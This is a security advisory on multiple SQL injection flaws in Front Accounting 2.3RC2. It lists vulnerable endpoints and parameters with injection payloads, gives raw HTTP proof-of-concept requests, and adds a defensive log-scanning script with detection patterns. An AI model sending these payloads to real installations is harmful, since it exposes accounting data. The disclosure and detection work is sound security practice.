Front Accounting (FA) is a professional web-based accounting system. Front Accounting 2.3RC2 has multiple SQL injection vulnerabilities, which may lead to leakage of sensitive information.
[+] Info:
~~~~~~~~~
Advisory Name: Multiple SQL Injections in Front Accounting
Internal Cybsec Advisory Id: 2010-1003-Multiple SQL Injections in Front Accounting
Vulnerability Class: SQL Injection
Affected Applications: Front Accounting v2.3RC2; other versions may also be affected.
Affected Platforms: Any running Front Accounting v2.3RC2
Local/Remote: Remote
Severity: High, CVSS 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)
Researcher: Juan Manuel Garcia
Vulnerability Description:
Multiple vulnerabilities have been discovered in Front Accounting which can be exploited by attackers to conduct SQL injection attacks.
At least the following parameters are not properly sanitized:
http://xxx.xxx.xxx.xxx/admin/fiscalyears.php
  The attacker can set the value of parameter from_date to 01%2F01%2F2008%27%3B
http://xxx.xxx.xxx.xxx/dimensions/dimension_entry.php
  The attacker can set the value of parameter ref to 1234%27%3B
  The attacker can set the value of parameter trans_no to 31%20having%201=1--
http://xxx.xxx.xxx.xxx/dimensions/view/view_dimension.php
  The attacker can set the value of parameter trans_no to 3;
http://xxx.xxx.xxx.xxx/gl/bank_account_reconcile.php
  The attacker can set the value of parameter reconcile_date to 1234%27%3B
http://xxx.xxx.xxx.xxx/gl/inquiry/balance_sheet.php
  The attacker can set the value of parameter TransToDate to 1234%27+having+1%3D1--
http://xxx.xxx.xxx.xxx/gl/inquiry/bank_inquiry.php
http://xxx.xxx.xxx.xxx/gl/inquiry/gl_account_inquiry.php
http://xxx.xxx.xxx.xxx/gl/inquiry/gl_trial_balance.php
http://xxx.xxx.xxx.xxx/gl/inquiry/profit_loss.php
http://xxx.xxx.xxx.xxx/gl/inquiry/tax_inquiry.php
  The attacker can set the value of parameter TransToDate to 1234%27+having+1%3D1--
  The attacker can set the value of parameter TransToDate to 1234%27%3B
http://xxx.xxx.xxx.xxx/gl/inquiry/journal_inquiry.php
  The attacker can set the value of parameter FromDate to 1234%27%3B
  The attacker can set the value of parameter Memo to 1234%27%3B
  The attacker can set the value of parameter Ref to 1234%27%3B
  The attacker can set the value of parameter ToDate to 1234%27%3B
http://xxx.xxx.xxx.xxx/inventory/inquiry/stock_movements.php
  The attacker can set the value of parameter AfterDate to 1234%27%3B
  The attacker can set the value of parameter BeforeDate to 1234%27%3B
http://xxx.xxx.xxx.xxx/manufacturing/work_order_add_finished.php
  The attacker can set the value of parameter ref to 1234%27%3B
  The attacker can set the value of parameter selected_id to 181+having+1%3D1--
  The attacker can set the value of parameter trans_no to 181%20having%201=1--
http://xxx.xxx.xxx.xxx/manufacturing/work_order_issue.php
  The attacker can set the value of parameter IssueType to 1%29+having+1%3D1--
  The attacker can set the value of parameter Location to SH%27%3B
  The attacker can set the value of parameter WorkCentre to 1%27%3B
  The attacker can set the value of parameter _focus to _stock_id_edit%27%3B
  The attacker can set the value of parameter _stock_id_edit to %27%3B
  The attacker can set the value of parameter _stock_id_update to +%27%3B
  The attacker can set the value of parameter date_ to 1234%27%3B
  The attacker can set the value of parameter memo_ to 1234%27%3B
  The attacker can set the value of parameter qty to 1234%27%3B
  The attacker can set the value of parameter ref to 1234%27%3B
  The attacker can set the value of parameter std_cost to 1234%27+having+1%3D1--
  The attacker can set the value of parameter stock_id to Business1%27%3B
  The attacker can set the value of parameter trans_no to 181%20having%201=1--
http://xxx.xxx.xxx.xxx/purchasing/po_receive_items.php
  The attacker can set the value of parameter PONumber to 351%20having%201=1--
http://xxx.xxx.xxx.xxx/purchasing/supplier_credit.php
  The attacker can set the value of parameter invoice_no to 21;
  The attacker can set the value of parameter receive_begin to 1234%27%3B
  The attacker can set the value of parameter receive_end to 1234%27+having+1%3D1--
http://xxx.xxx.xxx.xxx/reporting/prn_redirect.php
  The attacker can set the value of parameter PARAM_1 to 361%20having%201=1--
http://xxx.xxx.xxx.xxx/sales/customer_credit_invoice.php
  The attacker can set the value of parameter InvoiceNumber to 106;
Other parameters might also be affected.
[+] PoC:
~~~~~~~~~
Some proofs of concept:

* http://xxx.xxx.xxx.xxx/dimensions/dimension_entry.php?trans_no=
PoC:
GET /dimensions/dimension_entry.php?trans_no=31%20having%201=1-- HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d=cbe43b3ad36c2622030f8b1093144916
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/dimensions/inquiry/search_dimensions.php

* http://xxx.xxx.xxx.xxx/purchasing/allocations/supplier_allocate.php?trans_no=11&trans_type=
PoC:
GET /purchasing/allocations/supplier_allocate.php?trans_no=11&trans_type=11%20having%201=1-- HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d=2aa6f7cc954528a151a5f5d6c658f418
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/purchasing/allocations/supplier_allocation_main.php

* http://xxx.xxx.xxx.xxx/purchasing/po_receive_items.php?PONumber=
PoC:
GET /purchasing/po_receive_items.php?PONumber=351%20having%201=1-- HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d=2aa6f7cc954528a151a5f5d6c658f418
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/purchasing/inquiry/po_search.php

* http://xxx.xxx.xxx.xxx/purchasing/supplier_credit.php?New=1&invoice_no=
PoC:
GET /purchasing/supplier_credit.php?New=1&invoice_no=21; HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d=2aa6f7cc954528a151a5f5d6c658f418
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/purchasing/inquiry/supplier_inquiry.php

* http://xxx.xxx.xxx.xxx/reporting/prn_redirect.php?PARAM_0=36&PARAM_1=3
PoC:
GET /reporting/prn_redirect.php?PARAM_0=36&PARAM_1=361%20having%201=1--&PARAM_2=&PARAM_3=0&PARAM_4=&REP_ID=111 HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d=a3101d91a3ae6ede3e0ab57f90c03b79
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/sales/inquiry/sales_orders_view.php?type=32
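The requests above leave a clear trace in the web server's access log: a request to one of the affected endpoints whose query string, once URL-decoded, carries a statement terminator or an appended "having 1=1--" clause. The following Python script is an added defender-side example, not part of the advisory or of Front Accounting; it scans constructed access-log lines in NCSA common format for exactly those two payload shapes against the endpoint list in the advisory. The two signatures are heuristics assumed for this example, not an exhaustive SQL injection test, and the log lines (addresses, timestamps, sizes) are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Endpoints named in the advisory (paths only; the host does not matter).
AFFECTED_PATHS = {
    "/admin/fiscalyears.php",
    "/dimensions/dimension_entry.php",
    "/dimensions/view/view_dimension.php",
    "/gl/bank_account_reconcile.php",
    "/gl/inquiry/balance_sheet.php",
    "/gl/inquiry/bank_inquiry.php",
    "/gl/inquiry/gl_account_inquiry.php",
    "/gl/inquiry/gl_trial_balance.php",
    "/gl/inquiry/profit_loss.php",
    "/gl/inquiry/tax_inquiry.php",
    "/gl/inquiry/journal_inquiry.php",
    "/inventory/inquiry/stock_movements.php",
    "/manufacturing/work_order_add_finished.php",
    "/manufacturing/work_order_issue.php",
    "/purchasing/po_receive_items.php",
    "/purchasing/supplier_credit.php",
    "/purchasing/allocations/supplier_allocate.php",
    "/reporting/prn_redirect.php",
    "/sales/customer_credit_invoice.php",
}

# Heuristics for the two payload shapes in the advisory: a statement
# terminator inside a value, and an appended "having 1=1--" clause.
# Assumed for this example; tune before using on real traffic.
SIGNATURES = (
    ("statement terminator", re.compile(r";")),
    ("having clause", re.compile(r"\bhaving\b\s*1\s*=\s*1\s*--", re.IGNORECASE)),
)

# NCSA common log format: host ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+')


def scan_line(line):
    """Return (ip, path, param, decoded value, signature) for every query
    parameter of a request to an affected endpoint that matches a signature."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if url.path not in AFFECTED_PATHS:
        return []
    hits = []
    # Split on '&' only and decode %XX and '+' ourselves so the check runs
    # on the value the application would actually see, independent of how
    # the platform's parse_qsl treats ';' as a separator.
    for pair in url.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((m.group("ip"), url.path, name, value, label))
                break
    return hits


def scan_log(text):
    """Scan a whole log excerpt, one record per line."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            hits.extend(scan_line(line))
    return hits


# Constructed access-log excerpt: one benign request, three requests
# shaped like the advisory's payloads, and one suspicious value on a
# path outside the advisory's list (deliberately not flagged).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Dec/2010:10:15:01 +0000] "GET /dimensions/dimension_entry.php?trans_no=31 HTTP/1.0" 200 5123
10.0.0.5 - - [02/Dec/2010:10:15:09 +0000] "GET /dimensions/dimension_entry.php?trans_no=31%20having%201=1-- HTTP/1.0" 200 5411
10.0.0.5 - - [02/Dec/2010:10:16:22 +0000] "GET /purchasing/supplier_credit.php?New=1&invoice_no=21; HTTP/1.0" 200 4870
10.0.0.9 - - [02/Dec/2010:10:17:40 +0000] "GET /gl/inquiry/journal_inquiry.php?FromDate=1234%27%3B&ToDate=2010-12-02 HTTP/1.0" 200 6012
10.0.0.9 - - [02/Dec/2010:10:18:03 +0000] "GET /index.php?q=1%27%3B HTTP/1.0" 200 2201
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Restricting the match to the advisory's endpoint list keeps the false-positive rate low for a one-off hunt across historical logs; for ongoing monitoring the same signatures can be applied to every path, at the cost of reviewing more benign hits such as legitimate semicolons in free-text search fields.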
[+] Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/15565